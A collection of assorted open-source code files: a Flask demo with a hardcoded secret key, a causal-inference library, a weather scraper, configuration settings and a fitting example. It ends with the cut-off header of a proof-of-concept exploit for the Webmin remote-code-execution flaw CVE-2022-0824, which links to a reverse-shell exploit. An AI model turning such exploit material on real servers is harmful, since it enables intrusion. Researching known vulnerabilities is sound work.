# Change the `snake_case.py` file name to `CamelCase` class name.
# Please always name your model file name as `snake_case.py` and
# class name corresponding `CamelCase`.
camel_name = ''.join([i.capitalize() for i in name.split('_')])
try:
Model = getattr(importlib.import_module(
'.'+name, package=__package__), camel_name)
        except Exception:
raise ValueError(
f'Invalid Module File Name or Invalid Class Name {name}.{camel_name}!')
self.model = self.instancialize(Model)
def instancialize(self, Model, **other_args):
""" Instancialize a model using the corresponding parameters
from self.hparams dictionary. You can also input any args
to overwrite the corresponding value in self.hparams.
"""
        class_args = inspect.getfullargspec(Model.__init__).args[1:]
inkeys = self.hparams.keys()
args1 = {}
for arg in class_args:
if arg in inkeys:
args1[arg] = getattr(self.hparams, arg)
args1.update(other_args)
return Model(**args1)
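    # Illustrative note (not part of the original class): with the convention above,
    # model_name='standard_net' (a hypothetical file model/standard_net.py) resolves
    # to the class StandardNet, whose __init__ arguments are then filled from
    # self.hparams by instancialize().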
|
Flask/helloworld.py | Zhgx/bili | 166 | 11187795 | <reponame>Zhgx/bili
from flask import Flask, request, jsonify, session
from werkzeug.utils import redirect
app = Flask(__name__)
app.secret_key = "asdasdasdasdasdsaa"
@app.route("/", methods=["GET"])
def hello_world():
return "hello 音宫"
@app.route("/hey/<username>")
def hey_yingong(username):
return "我是 %s" % (username + username)
@app.route("/my/<float:number>")
def my_number(number):
return "我的数字 %s" % (number + number)
@app.route("/bilibili")
def bilibili():
return redirect("https://www.bilibili.com/")
@app.route("/test/my/first", methods=["POST"])
def first_post():
try:
my_json = request.get_json()
print(my_json)
get_name = my_json.get("name")
get_age = my_json.get("age")
if not all([get_name, get_age]):
return jsonify(msg="缺少参数")
get_age += 10
return jsonify(name=get_name, age=get_age)
except Exception as e:
print(e)
return jsonify(msg="出错了哦,请查看是否正确访问")
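# Illustrative request against the endpoint above (not part of the original script);
# assumes Flask's default port 5000:
#     curl -X POST http://127.0.0.1:5000/test/my/first \
#          -H "Content-Type: application/json" \
#          -d '{"name": "yingong", "age": 20}'
# which would return {"age": 30, "name": "yingong"}.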
# Login
@app.route("/try/login", methods=["POST"])
def login():
"""
    Account  username asd123
    Password password <PASSWORD>
:return:
"""
get_data = request.get_json()
username = get_data.get("username")
password = get_data.get("password")
if not all([username, password]):
return jsonify(msg="参数不完整")
if username == "asd123" and password == "<PASSWORD>":
        # if the check passes, save the login state in the session
session["username"] = username
return jsonify(msg="登录成功")
else:
return jsonify(msg="账号或密码错误")
# Check login status
@app.route("/session", methods=["GET"])
def check_session():
username = session.get("username")
if username is not None:
        # business logic goes here, e.g. database operations
        # e.g. query the user's avatar, level and coin count from the database
return jsonify(username=username)
else:
return jsonify(msg="出错了,没登录")
# Logout
@app.route("/try/logout", methods=["GET"])
def logout():
session.clear()
return jsonify(msg="成功退出登录!")
app.run(host="0.0.0.0")
|
causalinference/causal.py | youngminju-phd/Causalinference | 392 | 11187920 | from __future__ import division
import numpy as np
from itertools import combinations_with_replacement
from .core import Data, Summary, Propensity, PropensitySelect, Strata
from .estimators import OLS, Blocking, Weighting, Matching, Estimators
class CausalModel(object):
"""
Class that provides the main tools of Causal Inference.
"""
def __init__(self, Y, D, X):
self.old_data = Data(Y, D, X)
self.reset()
def reset(self):
"""
Reinitializes data to original inputs, and drops any estimated
results.
"""
Y, D, X = self.old_data['Y'], self.old_data['D'], self.old_data['X']
self.raw_data = Data(Y, D, X)
self.summary_stats = Summary(self.raw_data)
self.propensity = None
self.cutoff = None
self.blocks = None
self.strata = None
self.estimates = Estimators()
def est_propensity(self, lin='all', qua=None):
"""
Estimates the propensity scores given list of covariates to
include linearly or quadratically.
The propensity score is the conditional probability of
receiving the treatment given the observed covariates.
Estimation is done via a logistic regression.
Parameters
----------
lin: string or list, optional
Column numbers (zero-based) of variables of
the original covariate matrix X to include
linearly. Defaults to the string 'all', which
uses whole covariate matrix.
qua: list, optional
Tuples indicating which columns of the original
covariate matrix to multiply and include. E.g.,
[(1,1), (2,3)] indicates squaring the 2nd column
and including the product of the 3rd and 4th
columns. Default is to not include any
quadratic terms.
"""
lin_terms = parse_lin_terms(self.raw_data['K'], lin)
qua_terms = parse_qua_terms(self.raw_data['K'], qua)
self.propensity = Propensity(self.raw_data, lin_terms, qua_terms)
self.raw_data._dict['pscore'] = self.propensity['fitted']
self._post_pscore_init()
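    # Illustrative call (not part of the original class): with a CausalModel built from
    # some (Y, D, X), include all covariates linearly plus the square of the first
    # covariate and the product of the second and third:
    #     model.est_propensity(lin='all', qua=[(0, 0), (1, 2)])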
def est_propensity_s(self, lin_B=None, C_lin=1, C_qua=2.71):
"""
Estimates the propensity score with covariates selected using
the algorithm suggested by [1]_.
The propensity score is the conditional probability of
receiving the treatment given the observed covariates.
Estimation is done via a logistic regression.
The covariate selection algorithm is based on a sequence
of likelihood ratio tests.
Parameters
----------
lin_B: list, optional
Column numbers (zero-based) of variables of
the original covariate matrix X to include
linearly. Defaults to empty list, meaning
every column of X is subjected to the
selection algorithm.
C_lin: scalar, optional
Critical value used in likelihood ratio tests
to decide whether candidate linear terms should
be included. Defaults to 1 as in [1]_.
C_qua: scalar, optional
Critical value used in likelihood ratio tests
to decide whether candidate quadratic terms
should be included. Defaults to 2.71 as in
[1]_.
References
----------
.. [1] <NAME>. & <NAME>. (2015). Causal Inference in
Statistics, Social, and Biomedical Sciences: An
Introduction.
"""
lin_basic = parse_lin_terms(self.raw_data['K'], lin_B)
self.propensity = PropensitySelect(self.raw_data, lin_basic,
C_lin, C_qua)
self.raw_data._dict['pscore'] = self.propensity['fitted']
self._post_pscore_init()
def trim(self):
"""
Trims data based on propensity score to create a subsample with
better covariate balance.
The default cutoff value is set to 0.1. To set a custom cutoff
value, modify the object attribute named cutoff directly.
This method should only be executed after the propensity score
has been estimated.
"""
if 0 < self.cutoff <= 0.5:
pscore = self.raw_data['pscore']
keep = (pscore >= self.cutoff) & (pscore <= 1-self.cutoff)
Y_trimmed = self.raw_data['Y'][keep]
D_trimmed = self.raw_data['D'][keep]
X_trimmed = self.raw_data['X'][keep]
self.raw_data = Data(Y_trimmed, D_trimmed, X_trimmed)
self.raw_data._dict['pscore'] = pscore[keep]
self.summary_stats = Summary(self.raw_data)
self.strata = None
self.estimates = Estimators()
elif self.cutoff == 0:
pass
else:
raise ValueError('Invalid cutoff.')
def trim_s(self):
"""
Trims data based on propensity score using the cutoff
selection algorithm suggested by [1]_.
This method should only be executed after the propensity score
has been estimated.
References
----------
        .. [1] Crump, R. K., Hotz, V. J., Imbens, G. W., & Mitnik, O. A.
            (2009). Dealing with Limited Overlap in Estimation of
            Average Treatment Effects. Biometrika, 96, 187-199.
"""
pscore = self.raw_data['pscore']
g = 1.0/(pscore*(1-pscore)) # 1 over Bernoulli variance
self.cutoff = select_cutoff(g)
self.trim()
def stratify(self):
"""
Stratifies the sample based on propensity score.
By default the sample is divided into five equal-sized bins.
The number of bins can be set by modifying the object
attribute named blocks. Alternatively, custom-sized bins can
be created by setting blocks equal to a sorted list of numbers
between 0 and 1 indicating the bin boundaries.
This method should only be executed after the propensity score
has been estimated.
"""
Y, D, X = self.raw_data['Y'], self.raw_data['D'], self.raw_data['X']
pscore = self.raw_data['pscore']
if isinstance(self.blocks, int):
blocks = split_equal_bins(pscore, self.blocks)
else:
blocks = self.blocks[:] # make a copy; should be sorted
blocks[0] = 0 # avoids always dropping 1st unit
def subset(p_low, p_high):
return (p_low < pscore) & (pscore <= p_high)
subsets = [subset(*ps) for ps in zip(blocks, blocks[1:])]
strata = [CausalModel(Y[s], D[s], X[s]) for s in subsets]
self.strata = Strata(strata, subsets, pscore)
def stratify_s(self):
"""
Stratifies the sample based on propensity score using the
bin selection procedure suggested by [1]_.
The bin selection algorithm is based on a sequence of
two-sample t tests performed on the log-odds ratio.
This method should only be executed after the propensity score
has been estimated.
References
----------
        .. [1] Imbens, G. W. & Rubin, D. B. (2015). Causal Inference in
            Statistics, Social, and Biomedical Sciences: An
            Introduction.
"""
pscore_order = self.raw_data['pscore'].argsort()
pscore = self.raw_data['pscore'][pscore_order]
D = self.raw_data['D'][pscore_order]
logodds = np.log(pscore / (1-pscore))
K = self.raw_data['K']
blocks_uniq = set(select_blocks(pscore, logodds, D, K, 0, 1))
self.blocks = sorted(blocks_uniq)
self.stratify()
def est_via_ols(self, adj=2):
"""
Estimates average treatment effects using least squares.
Parameters
----------
adj: int (0, 1, or 2)
Indicates how covariate adjustments are to be
performed. Set adj = 0 to not include any
covariates. Set adj = 1 to include treatment
indicator D and covariates X separately. Set
adj = 2 to additionally include interaction
terms between D and X. Defaults to 2.
"""
self.estimates['ols'] = OLS(self.raw_data, adj)
def est_via_blocking(self, adj=1):
"""
Estimates average treatment effects using regression within
blocks.
This method should only be executed after the sample has been
stratified.
Parameters
----------
adj: int (0, 1, or 2)
Indicates how covariate adjustments are to be
performed for each within-bin regression.
Set adj = 0 to not include any covariates.
Set adj = 1 to include treatment indicator D
and covariates X separately. Set adj = 2 to
additionally include interaction terms between
D and X. Defaults to 1.
"""
self.estimates['blocking'] = Blocking(self.strata, adj)
def est_via_weighting(self):
"""
Estimates average treatment effects using doubly-robust
version of the Horvitz-Thompson weighting estimator.
"""
self.estimates['weighting'] = Weighting(self.raw_data)
def est_via_matching(self, weights='inv', matches=1, bias_adj=False):
"""
        Estimates average treatment effects using nearest-
        neighbor matching.
        Matching is done with replacement. The method supports multiple
        matches per unit. Correcting the bias that arises from imperfect
        matches is also supported. For details on methodology, see [1]_.
Parameters
----------
weights: str or positive definite square matrix
Specifies weighting matrix used in computing
distance measures. Defaults to string 'inv',
which does inverse variance weighting. String
'maha' gives the weighting matrix used in the
Mahalanobis metric.
matches: int
Number of matches to use for each subject.
bias_adj: bool
Specifies whether bias adjustments should be
attempted.
References
----------
        .. [1] Imbens, G. W. & Rubin, D. B. (2015). Causal Inference in
            Statistics, Social, and Biomedical Sciences: An
            Introduction.
"""
X, K = self.raw_data['X'], self.raw_data['K']
X_c, X_t = self.raw_data['X_c'], self.raw_data['X_t']
if weights == 'inv':
W = 1/X.var(0)
elif weights == 'maha':
V_c = np.cov(X_c, rowvar=False, ddof=0)
V_t = np.cov(X_t, rowvar=False, ddof=0)
if K == 1:
W = 1/np.array([[(V_c+V_t)/2]]) # matrix form
else:
W = np.linalg.inv((V_c+V_t)/2)
else:
W = weights
self.estimates['matching'] = Matching(self.raw_data, W,
matches, bias_adj)
def _post_pscore_init(self):
self.cutoff = 0.1
self.blocks = 5
def parse_lin_terms(K, lin):
if lin is None:
return []
elif lin == 'all':
return range(K)
else:
return lin
def parse_qua_terms(K, qua):
if qua is None:
return []
elif qua == 'all':
return list(combinations_with_replacement(range(K), 2))
else:
return qua
def sumlessthan(g, sorted_g, cumsum):
deduped_values = dict(zip(sorted_g, cumsum))
return np.array([deduped_values[x] for x in g])
def select_cutoff(g):
if g.max() <= 2*g.mean():
cutoff = 0
else:
sorted_g = np.sort(g)
cumsum_1 = range(1, len(g)+1)
LHS = g * sumlessthan(g, sorted_g, cumsum_1)
cumsum_g = np.cumsum(sorted_g)
RHS = 2 * sumlessthan(g, sorted_g, cumsum_g)
gamma = np.max(g[LHS <= RHS])
cutoff = 0.5 - np.sqrt(0.25 - 1./gamma)
return cutoff
def split_equal_bins(pscore, blocks):
q = np.linspace(0, 100, blocks+1)[1:-1] # q as in qth centiles
centiles = [np.percentile(pscore, x) for x in q]
return [0] + centiles + [1]
def calc_tstat(sample_c, sample_t):
N_c = sample_c.shape[0]
N_t = sample_t.shape[0]
var_c = sample_c.var(ddof=1)
var_t = sample_t.var(ddof=1)
return (sample_t.mean()-sample_c.mean()) / np.sqrt(var_c/N_c+var_t/N_t)
def calc_sample_sizes(D):
N = D.shape[0]
mid_index = N // 2
Nleft = mid_index
Nleft_t = D[:mid_index].sum()
Nleft_c = Nleft - Nleft_t
Nright = N - Nleft
Nright_t = D[mid_index:].sum()
Nright_c = Nright - Nright_t
return (Nleft_c, Nleft_t, Nright_c, Nright_t)
def select_blocks(pscore, logodds, D, K, p_low, p_high):
scope = (pscore >= p_low) & (pscore <= p_high)
c, t = (scope & (D==0)), (scope & (D==1))
Nleft_c, Nleft_t, Nright_c, Nright_t = calc_sample_sizes(D[scope])
if min(Nleft_c, Nleft_t, Nright_c, Nright_t) < K+1:
return [p_low, p_high]
tstat = calc_tstat(logodds[c], logodds[t])
if tstat <= 1.96:
return [p_low, p_high]
low = pscore[scope][0]
mid = pscore[scope][scope.sum() // 2]
high = pscore[scope][-1]
return select_blocks(pscore, logodds, D, K, low, mid) + \
select_blocks(pscore, logodds, D, K, mid, high)
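# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original module). It assumes the
# CausalModel constructor takes (Y, D, X) arrays, as stratify() above already
# relies on, and that numpy is imported as np at the top of this file. The
# data below are synthetic stand-ins purely for illustration.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    N = 500
    X_demo = rng.normal(size=(N, 3))                      # covariates
    p_true = 1.0 / (1.0 + np.exp(-X_demo[:, 0]))          # true propensity
    D_demo = (rng.uniform(size=N) < p_true).astype(int)   # treatment indicator
    Y_demo = 2.0*D_demo + X_demo.dot(np.ones(3)) + rng.normal(size=N)
    model = CausalModel(Y_demo, D_demo, X_demo)
    model.est_propensity_s()      # data-driven covariate selection
    model.trim_s()                # Crump et al. cutoff, then trim
    model.stratify_s()            # data-driven propensity-score blocks
    model.est_via_ols()
    model.est_via_blocking()
    model.est_via_matching(bias_adj=True)
    print(model.estimates)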
|
lib/disco/sysutil.py | pooya/disco | 786 | 11187987 | <reponame>pooya/disco<filename>lib/disco/sysutil.py
import sys, resource
from ctypes import *
import ctypes.util
if sys.platform == "darwin":
def available_memory():
libc = cdll.LoadLibrary(ctypes.util.find_library("libc"))
mem = c_uint64(0)
size = c_size_t(sizeof(mem))
libc.sysctlbyname.argtypes = [
c_char_p, c_void_p, c_void_p, c_void_p, c_ulong
]
libc.sysctlbyname(
b"hw.memsize",
c_voidp(addressof(mem)),
c_voidp(addressof(size)),
None,
0
)
return int(mem.value)
elif "linux" in sys.platform:
def available_memory():
libc = cdll.LoadLibrary(ctypes.util.find_library("libc"))
return libc.getpagesize() * libc.get_phys_pages()
else:
def available_memory():
return int(1024**4)
def set_mem_limit(limit):
bytes = 0
if limit.endswith('%'):
p = float(limit[:-1]) / 100.0
bytes = int(p * available_memory())
elif limit:
bytes = int(limit)
if bytes > 0:
soft, hard = resource.getrlimit(resource.RLIMIT_AS)
bmin = lambda x: min(bytes if x < 0 else x, bytes)
resource.setrlimit(resource.RLIMIT_AS, (bmin(soft), bmin(hard)))
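# Editor's sketch (not in the original module): a quick sanity check that the
# helpers above behave as expected on this machine. Capping RLIMIT_AS may be
# refused on some platforms (e.g. macOS), so treat this as illustrative only.
if __name__ == "__main__":
    print("detected physical memory: %d bytes" % available_memory())
    set_mem_limit("50%")
    print("RLIMIT_AS is now: %r" % (resource.getrlimit(resource.RLIMIT_AS),))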
|
us-weather-history/wunderground_scraper.py | h4ckfu/data | 16,124 | 11187988 | # coding: utf-8
from datetime import datetime, timedelta
from urllib.request import urlopen
import os
def scrape_station(station):
'''
This function scrapes the weather data web pages from wunderground.com
for the station you provide it.
You can look up your city's weather station by performing a search for
it on wunderground.com then clicking on the "History" section.
The 4-letter name of the station will appear on that page.
'''
# Scrape between July 1, 2014 and July 1, 2015
# You can change the dates here if you prefer to scrape a different range
current_date = datetime(year=2014, month=7, day=1)
end_date = datetime(year=2015, month=7, day=1)
# Make sure a directory exists for the station web pages
os.mkdir(station)
# Use .format(station, YYYY, M, D)
lookup_URL = 'http://www.wunderground.com/history/airport/{}/{}/{}/{}/DailyHistory.html'
while current_date != end_date:
if current_date.day == 1:
print(current_date)
formatted_lookup_URL = lookup_URL.format(station,
current_date.year,
current_date.month,
current_date.day)
html = urlopen(formatted_lookup_URL).read().decode('utf-8')
out_file_name = '{}/{}-{}-{}.html'.format(station, current_date.year,
current_date.month,
current_date.day)
with open(out_file_name, 'w') as out_file:
out_file.write(html)
current_date += timedelta(days=1)
# Scrape the stations used in this article
for station in ['KCLT', 'KCQT', 'KHOU', 'KIND', 'KJAX',
'KMDW', 'KNYC', 'KPHL', 'KPHX', 'KSEA']:
scrape_station(station)
|
parser.py | fossasia/open-event-scraper | 2,140 | 11188026 | # result is a dictionary of the excel sheet
def get_linkedin_url(result):
if result.has_key("linkedin"):
return result["linkedin"]
elif result.has_key("Linkedin"):
return result["Linkedin"]
elif result.has_key("LinkedIn"):
return result["LinkedIn"]
elif result.has_key("linkedIn"):
return result["linkedIn"]
return ""
def get_pic_url(result):
if result.has_key("Photo for Website and Program"):
return result["Photo for Website and Program"]
elif result.has_key("image"):
return result["image"]
return ""
|
flask_editablesite/settings.py | Jaza/flask-editablesite | 115 | 11188029 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
import ast
import os
import pymemcache.client.base as memcached
os_env = os.environ
class Config(object):
SECRET_KEY = os_env.get(
'FLASK_EDITABLESITE_SECRET',
'secret-key') # TODO: Change me
APP_DIR = os.path.abspath(
os.path.dirname(__file__)) # This directory
PROJECT_ROOT = os.path.abspath(os.path.join(APP_DIR, os.pardir))
SQLALCHEMY_DATABASE_URI = os_env.get(
'FLASK_EDITABLESITE_DATABASE_URI',
'postgresql://localhost/example') # TODO: Change me
SESSION_TYPE = os_env.get('FLASK_EDITABLESITE_SESSION_TYPE', None)
SESSION_USE_SIGNER = True
SESSION_KEY_PREFIX = 'flask-editablesite-session:'
SESSION_MEMCACHED = (
os_env.get('FLASK_EDITABLESITE_SESSION_MEMCACHED', None)
and memcached.Client(
[os_env.get('FLASK_EDITABLESITE_SESSION_MEMCACHED', None)],
binary=True)
or None)
SESSION_FILE_DIR = (
os_env.get('FLASK_EDITABLESITE_SESSION_FILE_DIR', None)
and os.path.abspath(os.path.join(
APP_DIR,
os_env.get('FLASK_EDITABLESITE_SESSION_FILE_DIR', None)))
or None)
USE_SESSIONSTORE_NOT_DB = (
os_env.get('FLASK_EDITABLESITE_USE_SESSIONSTORE_NOT_DB')
and ast.literal_eval(
os_env.get('FLASK_EDITABLESITE_USE_SESSIONSTORE_NOT_DB'))
or False)
SESSIONSTORE_USER_EMAIL = os_env.get(
'FLASK_EDITABLESITE_SESSIONSTORE_USER_EMAIL',
'<EMAIL>')
SESSIONSTORE_USER_FIRST_NAME = os_env.get(
'FLASK_EDITABLESITE_SESSIONSTORE_USER_FIRST_NAME',
'Test')
SESSIONSTORE_USER_LAST_NAME = os_env.get(
'FLASK_EDITABLESITE_SESSIONSTORE_USER_LAST_NAME',
'Dude')
SESSIONSTORE_USER_PASSWORD = os_env.get(
'FLASK_EDITABLESITE_SESSIONSTORE_USER_PASSWORD',
'<PASSWORD>')
BCRYPT_LOG_ROUNDS = 13
ASSETS_DEBUG = False
DEBUG_TB_ENABLED = False # Disable Debug toolbar
DEBUG_TB_INTERCEPT_REDIRECTS = False
CACHE_TYPE = 'simple' # Can be "memcached", "redis", etc.
SITE_NAME = 'Flask Editable Site'
ADMINS = (os_env.get('FLASK_EDITABLESITE_ADMINS')
and os_env.get('FLASK_EDITABLESITE_ADMINS').split(',')
or [])
MAIL_DEFAULT_SENDER = os_env.get(
'FLASK_EDITABLESITE_MAIL_DEFAULT_SENDER',
'<EMAIL>')
CONTACT_EMAIL_RECIPIENTS = (
os_env.get('FLASK_EDITABLESITE_CONTACT_EMAIL_RECIPIENTS')
and (
os_env.get('FLASK_EDITABLESITE_CONTACT_EMAIL_RECIPIENTS')
.split(','))
or [])
MAIL_SERVER = os_env.get(
'FLASK_EDITABLESITE_MAIL_SERVER', 'localhost')
MAIL_PORT = (
os_env.get('FLASK_EDITABLESITE_MAIL_PORT')
and ast.literal_eval(os_env.get('FLASK_EDITABLESITE_MAIL_PORT'))
or 25)
MAIL_USE_TLS = (
os_env.get('FLASK_EDITABLESITE_MAIL_USE_TLS')
and ast.literal_eval(
os_env.get('FLASK_EDITABLESITE_MAIL_USE_TLS'))
or False)
MAIL_USE_SSL = (
os_env.get('FLASK_EDITABLESITE_MAIL_USE_SSL')
and ast.literal_eval(
os_env.get('FLASK_EDITABLESITE_MAIL_USE_SSL'))
or False)
MAIL_USERNAME = os_env.get('FLASK_EDITABLESITE_MAIL_USERNAME', None)
MAIL_PASSWORD = os_env.get('FLASK_EDITABLESITE_MAIL_PASSWORD', None)
GOOGLE_ANALYTICS_ACCOUNT_ID = os_env.get(
'FLASK_EDITABLESITE_GOOGLE_ANALYTICS_ACCOUNT_ID', None)
SESSION_COOKIE_NAME = 'flask_editablesite_session'
REMEMBER_COOKIE_NAME = 'flask_editablesite_remember_token'
UPLOADS_RELATIVE_PATH = 'uploads/'
MEDIA_FOLDER = os.path.abspath(
os.path.join(APP_DIR, 'static/uploads'))
MEDIA_URL = '/static/uploads/'
MEDIA_THUMBNAIL_FOLDER = os.path.abspath(
os.path.join(APP_DIR, 'static/cache/thumbnails'))
MEDIA_THUMBNAIL_URL = 'cache/thumbnails/'
ERROR_MAIL_FORMAT = (
'\n'
'Message type: %(levelname)s\n'
'Location: %(pathname)s:%(lineno)d\n'
'Module: %(module)s\n'
'Function: %(funcName)s\n'
'Time: %(asctime)s\n'
'\n'
'Message:\n'
'\n'
'%(message)s\n')
EDITABLE_MODELS = {
'short_text_content_block': {
'classpath': (
'flask_editablesite.contentblock.models'
'.ShortTextContentBlock'),
'identifier_field': 'slug',
'title_field': 'title',
'text_fields': ['content'],
},
'rich_text_content_block': {
'classpath': (
'flask_editablesite.contentblock.models'
'.RichTextContentBlock'),
'identifier_field': 'slug',
'title_field': 'title',
'long_text_fields': ['content'],
},
'image_content_block': {
'classpath': (
'flask_editablesite.contentblock.models'
'.ImageContentBlock'),
'identifier_field': 'slug',
'title_field': 'title',
'image_fields': ['image'],
'image_relative_path': 'image-content-block/',
},
'gallery_item': {
'classpath': (
'flask_editablesite.gallery.models'
'.GalleryItem'),
'identifier_field': 'id',
'title_field': 'title',
'text_fields': ['title', 'date_taken'],
'long_text_fields': ['content'],
'image_fields': ['image'],
'image_relative_path': 'gallery-item/',
'is_createable': True,
'is_deleteable': True,
'is_reorderable': True,
'weight_field': 'weight',
'reorder_form_prefix': 'gallery_',
},
'event': {
'classpath': 'flask_editablesite.event.models.Event',
'identifier_field': 'id',
'title_field': 'title',
'text_fields': ['title', 'event_url',
'location_name', 'location_url'],
'date_fields': ['start_date', 'end_date'],
'time_fields': ['start_time', 'end_time'],
'is_createable': True,
'is_deleteable': True,
},
}
EDITABLE_SAMPLE_IMAGES_SCRAPE_URL = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE_URL', None)
EDITABLE_SAMPLE_IMAGES_SCRAPE_PARENTELNAME = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE_PARENTELNAME',
None)
EDITABLE_SAMPLE_IMAGES_SCRAPE_PARENTELCLASS = os_env.get(
(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE'
'_PARENTELCLASS'),
None)
EDITABLE_SAMPLE_IMAGES_SCRAPE_ONLYFIRSTEL = (
os_env.get(
('FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE'
'_ONLYFIRSTEL'))
and ast.literal_eval(os_env.get(
('FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_SCRAPE'
'_ONLYFIRSTEL')))
or False)
EDITABLE_SAMPLE_IMAGES_RELATIVE_PATH = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_RELATIVE_PATH',
None)
EDITABLE_PLACEHOLDER_IMAGE_RELATIVE_PATH = 'placeholder.png'
EDITABLE_SAMPLE_TEXT_SCRAPE_URLS = (
os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_TEXT_SCRAPE_URLS')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_TEXT_SCRAPE_URLS'))
or [])
EDITABLE_PLACEHOLDER_TEXT = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_PLACEHOLDER_TEXT', (
'<p>Lorem ipsum dolor sit amet, consectetur adipiscing '
'elit. Curabitur enim magna, dignissim sit amet aliquet '
'sed, varius sit amet tellus. Nam elementum, est non '
'dignissim egestas, est turpis ornare nunc, ac ornare '
'nisi purus id orci. Integer blandit sed leo eu tempus. '
'Donec egestas nisl lectus, congue efficitur velit '
'mollis mattis.</p>'))
EDITABLE_SAMPLE_URLS = (
os_env.get('FLASK_EDITABLESITE_EDITABLE_SAMPLE_URLS')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_URLS'))
or ['http://google.com/', 'http://facebook.com/',
'http://youtube.com/', 'http://yahoo.com/',
'http://amazon.com/', 'http://wikipedia.org/',
'http://twitter.com/', 'http://live.com/',
'http://linkedin.com/', 'http://ebay.com/',
'http://bing.com/', 'http://instagram.com/'])
EDITABLE_SAMPLE_IMAGES_CREDITS = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_IMAGES_CREDITS', None)
EDITABLE_SAMPLE_TEXT_CREDITS = os_env.get(
'FLASK_EDITABLESITE_EDITABLE_SAMPLE_TEXT_CREDITS', None)
GALLERY_NUM_DEFAULT_ITEMS = (
os_env.get('FLASK_EDITABLESITE_GALLERY_NUM_DEFAULT_ITEMS')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_GALLERY_NUM_DEFAULT_ITEMS'))
or 6)
GALLERY_LIMIT = (
os_env.get('FLASK_EDITABLESITE_GALLERY_LIMIT')
and ast.literal_eval(
os_env.get('FLASK_EDITABLESITE_GALLERY_LIMIT'))
or 3)
EVENT_NUM_DEFAULT_ITEMS = (
os_env.get('FLASK_EDITABLESITE_EVENT_NUM_DEFAULT_ITEMS')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EVENT_NUM_DEFAULT_ITEMS'))
or 12)
EVENT_UPCOMING_LIMIT = (
os_env.get('FLASK_EDITABLESITE_EVENT_UPCOMING_LIMIT')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EVENT_UPCOMING_LIMIT'))
or 3)
EVENT_PAST_LIMIT = (
os_env.get('FLASK_EDITABLESITE_EVENT_PAST_LIMIT')
and ast.literal_eval(os_env.get(
'FLASK_EDITABLESITE_EVENT_PAST_LIMIT'))
or 3)
class ProdConfig(Config):
"""Production configuration."""
ENV = 'prod'
DEBUG = False
DEBUG_TB_ENABLED = False # Disable Debug toolbar
class DevConfig(Config):
"""Development configuration."""
ENV = 'dev'
DEBUG = True
DEBUG_TB_ENABLED = True
ASSETS_DEBUG = True # Don't bundle/minify static assets
class TestConfig(Config):
TESTING = True
DEBUG = True
BCRYPT_LOG_ROUNDS = 1 # For faster tests
WTF_CSRF_ENABLED = False # Allows form testing
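# Editor's sketch (not in the original settings module): one conventional way
# to pick a config class at app-creation time. The FLASK_EDITABLESITE_ENV
# variable is an assumption for illustration; nothing above reads it.
def config_for(env_name=None):
    """Return ProdConfig, DevConfig or TestConfig for 'prod'/'dev'/'test'."""
    mapping = {'prod': ProdConfig, 'dev': DevConfig, 'test': TestConfig}
    if env_name is None:
        env_name = os_env.get('FLASK_EDITABLESITE_ENV', 'dev')
    return mapping.get(env_name, DevConfig)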
|
submitit/local/_local.py | sidsamsi/submitit | 602 | 11188056 | <reponame>sidsamsi/submitit
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import sys
from pathlib import Path
from .local import Controller
if __name__ == "__main__":
assert len(sys.argv) == 2, "Usage: _local.py <submitit_folder>"
# most arguments are read from environment variables.
controller = Controller(Path(sys.argv[1]))
controller.run()
|
examples/signal_bkg_mass_fit.py | simonthor/zfit | 129 | 11188107 | <filename>examples/signal_bkg_mass_fit.py
# Copyright (c) 2020 zfit
import zfit
# create space
obs = zfit.Space("x", limits=(-10, 10))
# parameters
mu = zfit.Parameter("mu", 1., -4, 6)
sigma = zfit.Parameter("sigma", 1., 0.1, 10)
lambd = zfit.Parameter("lambda", -0.06, -1, -0.01)
frac = zfit.Parameter("fraction", 0.3, 0, 1)
# model building, pdf creation
gauss = zfit.pdf.Gauss(mu=mu, sigma=sigma, obs=obs)
exponential = zfit.pdf.Exponential(lambd, obs=obs)
model = zfit.pdf.SumPDF([gauss, exponential], fracs=frac)
# data
n_sample = 10000
data = model.create_sampler(n_sample, limits=obs)
data.resample()
# set the values to a start value for the fit
mu.set_value(0.5)
sigma.set_value(1.2)
lambd.set_value(-0.05)
frac.set_value(0.07)
# create NLL
nll = zfit.loss.UnbinnedNLL(model=model, data=data)
# create a minimizer
minimizer = zfit.minimize.Minuit()
result = minimizer.minimize(nll)
print(result)
# do the error calculations, here with minos
param_hesse = result.hesse()
param_errors, new_result = result.errors()
print(result.params)
|
2022/CVE-2022-0824/poc/pocsploit/CVE-2022-0824.py | hjyuan/reapoc | 421 | 11188111 | <gh_stars>100-1000
import requests
from plugins.oob import verify_request, gen_oob_domain
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Webmin below 1.990 - File Manager privilege exploit''',
"description": '''Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.''',
"severity": "high",
"references": [
"https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py",
"https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-0824/vultarget",
"https://nvd.nist.gov/vuln/detail/CVE-2022-0824"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "8.8",
"cve-id": "CVE-2022-0824",
